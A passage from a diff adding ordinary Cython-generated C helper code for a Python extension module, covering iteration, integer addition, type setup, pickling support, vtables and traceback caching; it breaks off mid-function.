PyList_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyList_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else +#endif + { + next_item = PyIter_Next(iter_obj); + if (unlikely(!next_item)) { + return __Pyx_IterFinish(); + } + } + if (pitem) { + *pitem = next_item; + } else if (pkey && pvalue) { + if (__Pyx_unpack_tuple2(next_item, pkey, pvalue, source_is_dict, source_is_dict, 1)) + return -1; + } else if (pkey) { + *pkey = next_item; + } else { + *pvalue = next_item; + } + return 1; +} + +/* PyIntBinop */ + #if !CYTHON_COMPILING_IN_PYPY +static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { + CYTHON_MAYBE_UNUSED_VAR(intval); + CYTHON_MAYBE_UNUSED_VAR(inplace); + CYTHON_UNUSED_VAR(zerodivision_check); + #if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(op1))) { + const long b = intval; + long x; + long a = PyInt_AS_LONG(op1); + + x = (long)((unsigned long)a + (unsigned long)b); + if (likely((x^a) >= 0 || (x^b) >= 0)) + return PyInt_FromLong(x); + return PyLong_Type.tp_as_number->nb_add(op1, op2); + } + #endif + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(PyLong_CheckExact(op1))) { + const long b = intval; + long a, x; +#ifdef HAVE_LONG_LONG + const PY_LONG_LONG llb = intval; + PY_LONG_LONG lla, llx; +#endif + if (unlikely(__Pyx_PyLong_IsZero(op1))) { + return __Pyx_NewRef(op2); + } + if (likely(__Pyx_PyLong_IsCompact(op1))) { + a = __Pyx_PyLong_CompactValue(op1); + } else { + const digit* digits = __Pyx_PyLong_Digits(op1); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); + switch (size) { + case -2: + if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { + a = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 2: + if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT) { + a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case -3: + if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { + a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 3: + if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT) { + a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case -4: + if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { + a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { + lla = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + case 4: + if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT) { + a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); + break; + #ifdef HAVE_LONG_LONG + } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT) { + lla = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); + goto long_long; + #endif + } + CYTHON_FALLTHROUGH; + default: return PyLong_Type.tp_as_number->nb_add(op1, op2); + } + } + x = a + b; + return PyLong_FromLong(x); +#ifdef HAVE_LONG_LONG + long_long: + llx = lla + llb; + return PyLong_FromLongLong(llx); +#endif + + + } + #endif + if (PyFloat_CheckExact(op1)) { + const long b = intval; +#if CYTHON_COMPILING_IN_LIMITED_API + double a = __pyx_PyFloat_AsDouble(op1); +#else + double a = PyFloat_AS_DOUBLE(op1); +#endif + double result; + + PyFPE_START_PROTECT("add", return NULL) + result = ((double)a) + (double)b; + PyFPE_END_PROTECT(result) + return PyFloat_FromDouble(result); + } + return (inplace ? PyNumber_InPlaceAdd : PyNumber_Add)(op1, op2); +} +#endif + +/* BufferIndexError */ + static void __Pyx_RaiseBufferIndexError(int axis) { + PyErr_Format(PyExc_IndexError, + "Out of bounds on buffer access (axis %d)", axis); +} + +/* PyUnicode_Unicode */ + static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj) { + if (unlikely(obj == Py_None)) + obj = __pyx_kp_u_None; + return __Pyx_NewRef(obj); +} + +/* PyObject_GenericGetAttrNoDict */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject *__Pyx_RaiseGenericGetAttributeError(PyTypeObject *tp, PyObject *attr_name) { + __Pyx_TypeName type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, attr_name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(attr_name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name) { + PyObject *descr; + PyTypeObject *tp = Py_TYPE(obj); + if (unlikely(!PyString_Check(attr_name))) { + return PyObject_GenericGetAttr(obj, attr_name); + } + assert(!tp->tp_dictoffset); + descr = _PyType_Lookup(tp, attr_name); + if (unlikely(!descr)) { + return __Pyx_RaiseGenericGetAttributeError(tp, attr_name); + } + Py_INCREF(descr); + #if PY_MAJOR_VERSION < 3 + if (likely(PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_HAVE_CLASS))) + #endif + { + descrgetfunc f = Py_TYPE(descr)->tp_descr_get; + if (unlikely(f)) { + PyObject *res = f(descr, obj, (PyObject *)tp); + Py_DECREF(descr); + return res; + } + } + return descr; +} +#endif + +/* PyObject_GenericGetAttr */ + #if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name) { + if (unlikely(Py_TYPE(obj)->tp_dictoffset)) { + return PyObject_GenericGetAttr(obj, attr_name); + } + return __Pyx_PyObject_GenericGetAttrNoDict(obj, attr_name); +} +#endif + +/* ValidateBasesTuple */ + #if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { + Py_ssize_t i, n = PyTuple_GET_SIZE(bases); + for (i = 1; i < n; i++) + { + PyObject *b0 = PyTuple_GET_ITEM(bases, i); + PyTypeObject *b; +#if PY_MAJOR_VERSION < 3 + if (PyClass_Check(b0)) + { + PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", + PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); + return -1; + } +#endif + b = (PyTypeObject*) b0; + if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + if (dictoffset == 0 && b->tp_dictoffset) + { + __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); + PyErr_Format(PyExc_TypeError, + "extension type '%.200s' has no __dict__ slot, " + "but base type '" __Pyx_FMT_TYPENAME "' has: " + "either add 'cdef dict __dict__' to the extension type " + "or add '__slots__ = [...]' to the base type", + type_name, b_name); + __Pyx_DECREF_TypeName(b_name); + return -1; + } + } + return 0; +} +#endif + +/* PyType_Ready */ + static int __Pyx_PyType_Ready(PyTypeObject *t) { +#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) + (void)__Pyx_PyObject_CallMethod0; +#if CYTHON_USE_TYPE_SPECS + (void)__Pyx_validate_bases_tuple; +#endif + return PyType_Ready(t); +#else + int r; + PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); + if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) + return -1; +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + { + int gc_was_enabled; + #if PY_VERSION_HEX >= 0x030A00b1 + gc_was_enabled = PyGC_Disable(); + (void)__Pyx_PyObject_CallMethod0; + #else + PyObject *ret, *py_status; + PyObject *gc = NULL; + #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) + gc = PyImport_GetModule(__pyx_kp_u_gc); + #endif + if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); + if (unlikely(!gc)) return -1; + py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); + if (unlikely(!py_status)) { + Py_DECREF(gc); + return -1; + } + gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); + Py_DECREF(py_status); + if (gc_was_enabled > 0) { + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); + if (unlikely(!ret)) { + Py_DECREF(gc); + return -1; + } + Py_DECREF(ret); + } else if (unlikely(gc_was_enabled == -1)) { + Py_DECREF(gc); + return -1; + } + #endif + t->tp_flags |= Py_TPFLAGS_HEAPTYPE; +#if PY_VERSION_HEX >= 0x030A0000 + t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; +#endif +#else + (void)__Pyx_PyObject_CallMethod0; +#endif + r = PyType_Ready(t); +#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) + t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; + #if PY_VERSION_HEX >= 0x030A00b1 + if (gc_was_enabled) + PyGC_Enable(); + #else + if (gc_was_enabled) { + PyObject *tp, *v, *tb; + PyErr_Fetch(&tp, &v, &tb); + ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); + if (likely(ret || r == -1)) { + Py_XDECREF(ret); + PyErr_Restore(tp, v, tb); + } else { + Py_XDECREF(tp); + Py_XDECREF(v); + Py_XDECREF(tb); + r = -1; + } + } + Py_DECREF(gc); + #endif + } +#endif + return r; +#endif +} + +/* SetupReduce */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce_is_named(PyObject* meth, PyObject* name) { + int ret; + PyObject *name_attr; + name_attr = __Pyx_PyObject_GetAttrStrNoError(meth, __pyx_n_s_name_2); + if (likely(name_attr)) { + ret = PyObject_RichCompareBool(name_attr, name, Py_EQ); + } else { + ret = -1; + } + if (unlikely(ret < 0)) { + PyErr_Clear(); + ret = 0; + } + Py_XDECREF(name_attr); + return ret; +} +static int __Pyx_setup_reduce(PyObject* type_obj) { + int ret = 0; + PyObject *object_reduce = NULL; + PyObject *object_getstate = NULL; + PyObject *object_reduce_ex = NULL; + PyObject *reduce = NULL; + PyObject *reduce_ex = NULL; + PyObject *reduce_cython = NULL; + PyObject *setstate = NULL; + PyObject *setstate_cython = NULL; + PyObject *getstate = NULL; +#if CYTHON_USE_PYTYPE_LOOKUP + getstate = _PyType_Lookup((PyTypeObject*)type_obj, __pyx_n_s_getstate); +#else + getstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_getstate); + if (!getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (getstate) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_getstate = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_getstate); +#else + object_getstate = __Pyx_PyObject_GetAttrStrNoError((PyObject*)&PyBaseObject_Type, __pyx_n_s_getstate); + if (!object_getstate && PyErr_Occurred()) { + goto __PYX_BAD; + } +#endif + if (object_getstate != getstate) { + goto __PYX_GOOD; + } + } +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce_ex = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#else + object_reduce_ex = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce_ex); if (!object_reduce_ex) goto __PYX_BAD; +#endif + reduce_ex = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce_ex); if (unlikely(!reduce_ex)) goto __PYX_BAD; + if (reduce_ex == object_reduce_ex) { +#if CYTHON_USE_PYTYPE_LOOKUP + object_reduce = _PyType_Lookup(&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#else + object_reduce = __Pyx_PyObject_GetAttrStr((PyObject*)&PyBaseObject_Type, __pyx_n_s_reduce); if (!object_reduce) goto __PYX_BAD; +#endif + reduce = __Pyx_PyObject_GetAttrStr(type_obj, __pyx_n_s_reduce); if (unlikely(!reduce)) goto __PYX_BAD; + if (reduce == object_reduce || __Pyx_setup_reduce_is_named(reduce, __pyx_n_s_reduce_cython)) { + reduce_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_reduce_cython); + if (likely(reduce_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce, reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_reduce_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (reduce == object_reduce || PyErr_Occurred()) { + goto __PYX_BAD; + } + setstate = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate); + if (!setstate) PyErr_Clear(); + if (!setstate || __Pyx_setup_reduce_is_named(setstate, __pyx_n_s_setstate_cython)) { + setstate_cython = __Pyx_PyObject_GetAttrStrNoError(type_obj, __pyx_n_s_setstate_cython); + if (likely(setstate_cython)) { + ret = PyDict_SetItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate, setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + ret = PyDict_DelItem(((PyTypeObject*)type_obj)->tp_dict, __pyx_n_s_setstate_cython); if (unlikely(ret < 0)) goto __PYX_BAD; + } else if (!setstate || PyErr_Occurred()) { + goto __PYX_BAD; + } + } + PyType_Modified((PyTypeObject*)type_obj); + } + } + goto __PYX_GOOD; +__PYX_BAD: + if (!PyErr_Occurred()) { + __Pyx_TypeName type_obj_name = + __Pyx_PyType_GetName((PyTypeObject*)type_obj); + PyErr_Format(PyExc_RuntimeError, + "Unable to initialize pickling for " __Pyx_FMT_TYPENAME, type_obj_name); + __Pyx_DECREF_TypeName(type_obj_name); + } + ret = -1; +__PYX_GOOD: +#if !CYTHON_USE_PYTYPE_LOOKUP + Py_XDECREF(object_reduce); + Py_XDECREF(object_reduce_ex); + Py_XDECREF(object_getstate); + Py_XDECREF(getstate); +#endif + Py_XDECREF(reduce); + Py_XDECREF(reduce_ex); + Py_XDECREF(reduce_cython); + Py_XDECREF(setstate); + Py_XDECREF(setstate_cython); + return ret; +} +#endif + +/* SetVTable */ + static int __Pyx_SetVtable(PyTypeObject *type, void *vtable) { + PyObject *ob = PyCapsule_New(vtable, 0, 0); + if (unlikely(!ob)) + goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(PyObject_SetAttr((PyObject *) type, __pyx_n_s_pyx_vtable, ob) < 0)) +#else + if (unlikely(PyDict_SetItem(type->tp_dict, __pyx_n_s_pyx_vtable, ob) < 0)) +#endif + goto bad; + Py_DECREF(ob); + return 0; +bad: + Py_XDECREF(ob); + return -1; +} + +/* GetVTable */ + static void* __Pyx_GetVtable(PyTypeObject *type) { + void* ptr; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *ob = PyObject_GetAttr((PyObject *)type, __pyx_n_s_pyx_vtable); +#else + PyObject *ob = PyObject_GetItem(type->tp_dict, __pyx_n_s_pyx_vtable); +#endif + if (!ob) + goto bad; + ptr = PyCapsule_GetPointer(ob, 0); + if (!ptr && !PyErr_Occurred()) + PyErr_SetString(PyExc_RuntimeError, "invalid vtable found for imported type"); + Py_DECREF(ob); + return ptr; +bad: + Py_XDECREF(ob); + return NULL; +} + +/* MergeVTables */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type) { + int i; + void** base_vtables; + __Pyx_TypeName tp_base_name; + __Pyx_TypeName base_name; + void* unknown = (void*)-1; + PyObject* bases = type->tp_bases; + int base_depth = 0; + { + PyTypeObject* base = type->tp_base; + while (base) { + base_depth += 1; + base = base->tp_base; + } + } + base_vtables = (void**) malloc(sizeof(void*) * (size_t)(base_depth + 1)); + base_vtables[0] = unknown; + for (i = 1; i < PyTuple_GET_SIZE(bases); i++) { + void* base_vtable = __Pyx_GetVtable(((PyTypeObject*)PyTuple_GET_ITEM(bases, i))); + if (base_vtable != NULL) { + int j; + PyTypeObject* base = type->tp_base; + for (j = 0; j < base_depth; j++) { + if (base_vtables[j] == unknown) { + base_vtables[j] = __Pyx_GetVtable(base); + base_vtables[j + 1] = unknown; + } + if (base_vtables[j] == base_vtable) { + break; + } else if (base_vtables[j] == NULL) { + goto bad; + } + base = base->tp_base; + } + } + } + PyErr_Clear(); + free(base_vtables); + return 0; +bad: + tp_base_name = __Pyx_PyType_GetName(type->tp_base); + base_name = __Pyx_PyType_GetName((PyTypeObject*)PyTuple_GET_ITEM(bases, i)); + PyErr_Format(PyExc_TypeError, + "multiple bases have vtable conflict: '" __Pyx_FMT_TYPENAME "' and '" __Pyx_FMT_TYPENAME "'", tp_base_name, base_name); + __Pyx_DECREF_TypeName(tp_base_name); + __Pyx_DECREF_TypeName(base_name); + free(base_vtables); + return -1; +} +#endif + +/* TypeImport */ + #ifndef __PYX_HAVE_RT_ImportType_3_0_0 +#define __PYX_HAVE_RT_ImportType_3_0_0 +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject *module, const char *module_name, const char *class_name, + size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size) +{ + PyObject *result = 0; + char warning[200]; + Py_ssize_t basicsize; + Py_ssize_t itemsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + PyObject *py_itemsize; +#endif + result = PyObject_GetAttrString(module, class_name); + if (!result) + goto bad; + if (!PyType_Check(result)) { + PyErr_Format(PyExc_TypeError, + "%.200s.%.200s is not a type object", + module_name, class_name); + goto bad; + } +#if !CYTHON_COMPILING_IN_LIMITED_API + basicsize = ((PyTypeObject *)result)->tp_basicsize; + itemsize = ((PyTypeObject *)result)->tp_itemsize; +#else + py_basicsize = PyObject_GetAttrString(result, "__basicsize__"); + if (!py_basicsize) + goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (basicsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; + py_itemsize = PyObject_GetAttrString(result, "__itemsize__"); + if (!py_itemsize) + goto bad; + itemsize = PyLong_AsSsize_t(py_itemsize); + Py_DECREF(py_itemsize); + py_itemsize = 0; + if (itemsize == (Py_ssize_t)-1 && PyErr_Occurred()) + goto bad; +#endif + if (itemsize) { + if (size % alignment) { + alignment = size % alignment; + } + if (itemsize < (Py_ssize_t)alignment) + itemsize = (Py_ssize_t)alignment; + } + if ((size_t)(basicsize + itemsize) < size) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize+itemsize); + goto bad; + } + if (check_size == __Pyx_ImportType_CheckSize_Error_3_0_0 && + ((size_t)basicsize > size || (size_t)(basicsize + itemsize) < size)) { + PyErr_Format(PyExc_ValueError, + "%.200s.%.200s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd-%zd from PyObject", + module_name, class_name, size, basicsize, basicsize+itemsize); + goto bad; + } + else if (check_size == __Pyx_ImportType_CheckSize_Warn_3_0_0 && (size_t)basicsize > size) { + PyOS_snprintf(warning, sizeof(warning), + "%s.%s size changed, may indicate binary incompatibility. " + "Expected %zd from C header, got %zd from PyObject", + module_name, class_name, size, basicsize); + if (PyErr_WarnEx(NULL, warning, 0) < 0) goto bad; + } + return (PyTypeObject *)result; +bad: + Py_XDECREF(result); + return NULL; +} +#endif + +/* CLineInTraceback */ + #ifndef CYTHON_CLINE_IN_TRACEBACK +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line) { + PyObject *use_cline; + PyObject *ptype, *pvalue, *ptraceback; +#if CYTHON_COMPILING_IN_CPYTHON + PyObject **cython_runtime_dict; +#endif + CYTHON_MAYBE_UNUSED_VAR(tstate); + if (unlikely(!__pyx_cython_runtime)) { + return c_line; + } + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ + #if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ + #include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation 